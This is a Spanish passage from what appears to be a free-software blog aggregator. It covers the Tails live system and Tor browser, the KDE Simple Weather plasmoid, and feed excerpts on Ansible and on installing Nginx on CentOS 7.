El proceso es: descargar la imagen (preferiblemente por torrent), copiarla en nuestra memoria USB, reiniciar nuestro equipo y arrancarlo desde ese dispositivo.

Después de una pantalla de inicio para configurar idioma y teclado (también puedes crear una cuenta de administrador root), se iniciará el sistema GNU/Linux Debian con escritorio Gnome como el de la captura que abre este artículo. Nos conectamos a nuestra red Wifi o por cable y a navegar libremente…

Tails viene con un montón de herramientas ya preinstaladas. Podemos encontrar la “suite” ofimática de LibreOffice, Gimp, Audacity, Scribus, el navegador Tor, un navegador “normal”, cliente de correo Thunderbird, Pidgin, OnionShare… y muchas otras herramientas de sistema y utilidades.

Tails, está configurado para que todas las comunicaciones al exterior se hagan mediante la red Tor, que anonimiza nuestra conexión “enrutando” nuestras conexiones a través de servidores gestionados por voluntarios en todo el mundo.

Además de Tails, también se ha publicado una nueva versión del navegador Tor, que encontramos en Tails, y que también podemos instalar y utilizar en nuestro sistema operativo, sea cual sea, ya que es multiplataforma.

Tor es una versión modificada del gran navegador Firefox, al que se le han hecho algunos retoques que se encargan de “enrutar” nuestra navegación mediante la red Tor.

Son dos buenas herramientas con las que eludir el seguimiento masivo al que una vez que nos conectamos a internet estamos expuestos. A veces con conocimiento de causa y otras realizado a mala fe por parte de gobiernos o grandes empresas.

En la página web de Tails podrás toda la información sobre cómo descargar, copiar, y utilizar este sistema operativo, y la mayoría se encuentra traducida en español, gracias a la colaboración desinteresada de los traductores.

Enlaces de interés

imagen de Tails en una versión antigua, con apariencia de Windows.

02 Feb 17:17

Simple Weather – Plasmoides de KDE (101)

by baltolkien

Sobrepasado el número 100, llegamos al número que siempre identifico con Depeche Mode y su magnífico álbum en directo 101. Os presento Simple Weather, un plasmoide minimalista con lo que seguir personalizando nuestro entorno de trabajo favorito.

Simple Weather – Plasmoides de KDE (101)

Tener un plasmoide meteorológico fue una de las razones por las que me interesaron estos adornos visuales y funcionales que pueblan en ocasiones mi escritorio.

Y es que, como hemos dicho en muchas de ocasiones, las posibilidades de personalización del escritorio de KDE son infinitas, y entre ellas mostrar información relevante es una de las más populares.

Os presento Simple Weather, una creación de Zren, un plasmoide minimalista que nos coloca la temperatura actual de la zona que seleccionemos, junto con la máxima y la mínima del día. Además, una simple palabra nos indica el aspecto general del momento: nublado, soleado, frío, etc.

Además, en las opciones generales se puede seleccionar entre 4 servicios meteorológicos y algunas opciones de personalización como intervalo de actualización y tipo de fuente.

Simple Weather – Plasmoides de KDE (101)

 

 

La instalación de Simple Weather se realiza desde “Obtener más widgets” del propio escritorio Plasma, así que no hay dificultad ninguna para tenerlo decorando nuestro escritorio.

Y como siempre digo, si os gusta el plasmoide podéis “pagarlo” de muchas formas en la nueva página de KDE Store, que estoy seguro que el desarrollador lo agradecerá: puntúale positivamente, hazle un comentario en la página o realiza una donación. Ayudar al desarrollo del Software Libre también se hace simplemente dando las gracias, ayuda mucho más de lo que os podéis imaginar, recordad la campaña I love Free Software Day 2017 de la Free Software Foundation donde se nos recordaba esta forma tan sencilla de colaborar con el gran proyecto del Software Libre y que en el blog dedicamos un artículo.

Más información: KDE Store

 

¿Qué son los plasmoides?

Para los no iniciados en el blog, quizás la palabra plasmoide le suene un poco rara pero no es mas que el nombre que reciben los widgets para el escritorio Plasma de KDE.

En otras palabras, los plasmoides no son más que pequeñas aplicaciones que puestas sobre el escritorio o sobre una de las barras de tareas del mismo aumentan las funcionalidades del mismo o simplemente lo decoran.

02 Feb 17:02

¿Qué es Ansible? ¿Para qué sirve?

by davidochobits

Este es el primero de una serie de artículos sobre Ansible. Lo podemos considerar como el capítulo 0. En él veremos qué es y en que consiste este sistema de orquestación tan en boga...

La entrada ¿Qué es Ansible? ¿Para qué sirve? se publicó primero en ochobitshacenunbyte.

02 Feb 16:45

Instalar la última versión de Nginx en Centos 7

by davidochobits

Aprendemos a instalar la última versión del servidor web Nginx en Centos 7. Ya sabemos que paquetes como Nginx o Apache ya vienen en los repositorios, de la mayoría de las distribuciones. Pero las...

La entrada Instalar la última versión de Nginx en Centos 7 se publicó primero en ochobitshacenunbyte.